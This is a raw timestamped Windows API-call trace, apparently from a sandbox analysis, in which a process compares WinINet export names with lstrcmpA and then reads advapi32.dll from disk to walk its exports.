[0221.609] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0221.610] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.610] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0221.611] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0221.612] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0221.612] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0221.613] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0221.614] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0221.615] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0221.615] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0221.616] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0221.617] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0221.618] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0221.618] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0221.618] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0221.618] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.618] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0221.618] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0221.619] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0222.046] GetProcessHeap () returned 0x480000 [0222.047] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x410c040 | out: hHeap=0x480000) returned 1 [0222.060] GetProcessHeap () returned 0x480000 [0222.060] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4999a0 [0222.061] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0222.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0222.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0222.061] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0222.061] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0222.062] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0222.062] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0222.062] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0222.062] GetProcessHeap () returned 0x480000 [0222.062] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa3ef0) returned 0x2d42010 [0222.064] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0222.064] ReadFile (in: hFile=0x140, lpBuffer=0x2d42010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0222.348] CloseHandle (hObject=0x140) returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0222.349] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0222.350] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0222.350] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", 